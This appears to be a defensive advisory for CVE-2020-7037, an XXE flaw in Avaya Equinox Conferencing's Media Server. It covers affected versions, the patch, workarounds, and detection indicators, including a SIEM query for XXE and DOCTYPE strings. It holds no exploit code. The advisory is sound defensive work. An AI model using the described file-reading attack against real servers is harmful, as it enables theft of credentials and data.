CVE-2020-7037
📋 TL;DR
An XML External Entities (XXE) vulnerability in the Media Server component of Avaya Equinox Conferencing allows authenticated remote attackers to read files from the affected system or cause denial of service. This affects all authenticated users of Avaya Equinox Conferencing 9.x versions before 9.1.11. The product has been rebranded as Avaya Meetings Server.
💻 Affected Systems
- Avaya Equinox Conferencing
- Avaya Meetings Server
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
Attackers could read sensitive system files, configuration files, or credentials stored on the server, potentially leading to full system compromise or data exfiltration.
Likely Case
Attackers with valid credentials could read arbitrary files from the server filesystem, potentially accessing configuration files, logs, or other sensitive data.
If Mitigated
With proper network segmentation and authentication controls, impact is limited to authenticated users within the network perimeter.
🎯 Exploit Status
XXE vulnerabilities are well-understood attack vectors with established exploitation patterns. Requires authenticated access to the vulnerable component.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 9.1.11 or later
Vendor Advisory: https://support.avaya.com/css/P8/documents/101075574
Restart Required: Yes
Instructions:
1. Download Avaya Equinox Conferencing version 9.1.11 or later from Avaya support portal. 2. Backup current configuration. 3. Install the update following Avaya's upgrade procedures. 4. Restart the Media Server component.
🔧 Temporary Workarounds
Disable XML External Entity Processing
allConfigure XML parser to disable external entity resolution if supported by the application
Network Segmentation
allRestrict access to Media Server component to only trusted networks and users
🧯 If You Can't Patch
- Implement strict network access controls to limit which users can reach the Media Server component
- Monitor for unusual XML parsing activity or file access patterns in server logs
🔍 How to Verify
Check if Vulnerable:
Check the installed version of Avaya Equinox Conferencing/Meetings Server. If version is 9.x and less than 9.1.11, the system is vulnerable.Check Version:
Check via Avaya Equinox Conferencing web interface or administrative console for version information.Verify Fix Applied:
Verify the installed version is 9.1.11 or later. Test XML parsing functionality to ensure external entities are not processed.📡 Detection & Monitoring
Log Indicators:
- Unusual XML parsing errors
- File access attempts via XML parsing
- Large XML payloads being processed
Network Indicators:
- XML requests containing external entity references
- Outbound connections initiated by XML parser
SIEM Query:
source="avaya-media-server" AND (message="*XXE*" OR message="*external entity*" OR message="*DOCTYPE*")